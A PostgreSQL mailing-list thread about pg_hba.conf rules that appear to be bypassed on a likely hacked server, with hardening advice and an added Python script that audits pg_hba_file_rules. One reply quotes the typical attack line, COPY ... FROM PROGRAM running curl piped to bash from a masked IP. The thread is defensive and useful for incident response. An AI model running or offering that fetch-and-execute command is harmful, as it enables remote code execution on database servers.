Re: How to confirm the pg_hba.conf service is correctly working

From: Imre Samu <pella(dot)samu(at)gmail(dot)com>
To: shing dong <s7eqs7eq(at)gmail(dot)com>
Cc: "pgsql-general(at)postgresql(dot)org" <pgsql-general(at)postgresql(dot)org>
Subject: Re: How to confirm the pg_hba.conf service is correctly working
Date: 2021-12-23 11:25:13
Message-ID: CAJnEWw=xdEhw=ZBrM0=oM6oSdJwwUujKSbVzQwc-hpw802O2YQ@mail.gmail.com
Lists: pgsql-general

> Have checked select * from pg_hba_file_rules results are consistent with
> pg_hba.conf
> any ip and user still can login in db

Any proxy? Port/IP forwarding running in the background?

Next time, check the "client_addr":
- SELECT usename, client_addr FROM pg_stat_activity where client_addr is not null;

> a Postgres DB that was Hacked l
> When I remove pg software and reinstall pg software

I agree with others;
- please re-install the full system! ( not just the PostgreSQL! )

Usually, the attack sequence:
- open port, brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.

https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0 (2020 Mar)
https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/

> host VJ VJ_USER 10.10.10.1/32 md5

imho:
- use different ports
- change "md5" to "scram-sha-256"
- maybe: add https://www.postgresql.org/docs/10/auth-delay.html
- for administration use SSH tunnels: https://www.postgresql.org/docs/10/ssh-tunnels.html (and use a firewall for closing all external ports, or use SSL)

Regards,
Imre
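As an added example (not code from this thread), here is a small Python script that parses `SELECT * FROM pg_hba_file_rules` output exported as CSV and flags rules that are not in the administrator's approved set, that use trust/password/md5, or that cover an address range wider than a /24; the sample rows are constructed from lines quoted in the thread, plus one made-up broad rule, and the approved set is the single rule the original poster said pg_hba.conf contained.

```python
import csv
import io
import ipaddress

# Constructed sample in the shape of `SELECT * FROM pg_hba_file_rules` exported as CSV:
# four rows borrowed from the thread plus one deliberately broad "trust" rule (line 200)
# that is NOT on the page, included only to exercise the wide-network check.
SAMPLE_RULES = """\
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
200,host,{all},{all},0.0.0.0,0.0.0.0,trust,,
"""

# The one rule the original poster believed pg_hba.conf contained: host VJ VJ_USER 10.10.10.1/32 md5
EXPECTED = {("host", "{VJ}", "{VJ_USER}", "10.10.10.1", "255.255.255.255", "md5")}

# "trust" skips authentication entirely; "password" and "md5" are the weak password
# methods Imre suggests replacing with scram-sha-256.
WEAK_METHODS = {"trust", "password", "md5"}
MAX_PREFIXLEN_TO_FLAG = 24   # anything wider than a /24 is reported as "broad"

def audit_hba_rules(csv_text, expected):
    """Return (line_number, category, detail) findings for every loaded rule that is not in
    the approved set, uses a weak auth method, covers a wide address range, or failed to parse."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        line = int(row["line_number"])
        key = (row["type"], row["database"], row["user_name"],
               row["address"], row["netmask"], row["auth_method"])
        if key not in expected:
            findings.append((line, "unexpected", f"{row['user_name']}@{row['address'] or 'local'}"))
        if row["auth_method"] in WEAK_METHODS:
            findings.append((line, "weak_auth", row["auth_method"]))
        if row["error"]:
            findings.append((line, "parse_error", row["error"]))
        addr, mask = row["address"], row["netmask"]
        if addr == "all":
            findings.append((line, "broad", "all"))
        elif addr and mask:
            try:
                net = ipaddress.ip_network(f"{addr}/{mask}", strict=False)
            except ValueError:
                continue   # hostnames and keywords such as samenet are not CIDR ranges
            if net.prefixlen < MAX_PREFIXLEN_TO_FLAG:
                findings.append((line, "broad", str(net)))
    return findings
```

Run `audit_hba_rules(SAMPLE_RULES, EXPECTED)` against a real export (`psql --csv -c "SELECT * FROM pg_hba_file_rules"`) after every reload to catch rules you did not write.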

shing dong <s7eqs7eq(at)gmail(dot)com> wrote (on 2021 Dec 23, Thu, 11:15):

> Your original post stated that you only had
>> host VJ VJ_USER 10.10.10.1/32 md5
>> in the pg_hba.conf file.
>> However the result of the select is considerably more ?
>
> DEAR
>
> I have tested this feature, only had
>
> host VJ VJ_USER 10.10.10.1/32 md5
>
> in the pg_hba.conf file
>
> Have checked select * from pg_hba_file_rules results are consistent with
> pg_hba.conf
>
> any ip and user still can login in db
>
> When I remove the pg software and reinstall it, the function of
> pg_hba is working, which represents that the location and content of
> pg_hba.conf are correct
>
> Suspect that the function of pg_hba is destroyed?
>
> Dave Cramer <davecramer(at)postgres(dot)rocks> wrote on Wed, 22 Dec 2021 at 6:58 PM:
>
>>
>> On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq(at)gmail(dot)com> wrote:
>>
>>> *Dear Dave *
>>>
>>> The result after reload is
>>>
>>> 2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""
>>>
>>> No other error message
>>>
>>> ------------------------------------------
>>>
>>> result of select * from pg_hba_file_rules
>>>
>>> line_number,type,database,user_name,address,netmask,auth_method,options,error
>>> 84,local,{all},{all},,,md5,,
>>> 86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
>>> 87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
>>> 88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
>>> 89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
>>> 92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
>>> 93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
>>> 94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
>>> 95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
>>> 96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
>>> 99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
>>> 100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
>>> 101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
>>> 102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
>>> 103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
>>> 104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
>>> 105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
>>> 106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
>>> 107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
>>> 108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
>>> 109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
>>> 110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
>>> 111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
>>> 112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
>>> 113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
>>> 114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
>>> 115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
>>> 116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
>>> 117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
>>> 118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
>>> 119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
>>> 120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
>>> 121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
>>> 122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
>>> 123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
>>> 124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
>>> 125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
>>> 126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
>>> 127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
>>> 128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
>>> 129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
>>> 130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
>>> 131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
>>> 132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
>>> 133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
>>> 135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
>>> 136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
>>> 137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
>>> 138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
>>> 139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
>>> 140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
>>> 141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
>>> 142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
>>> 143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
>>> 144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
>>> 145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
>>> 146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
>>> 147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
>>> 148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
>>> 149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
>>> 150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
>>> 153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
>>> 154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
>>> 155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
>>> 156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
>>> 157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
>>> 161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
>>> 165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
>>> 168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,
>>>
>>
>> Hmmm for some reason I did not reply to the list.
>>
>> At any rate.
>>
>> Your original post stated that you only had
>>
>> host VJ VJ_USER 10.10.10.1/32 md5
>>
>> in the pg_hba.conf file.
>>
>> However the result of the select is considerably more ?
>>
>> Dave Cramer
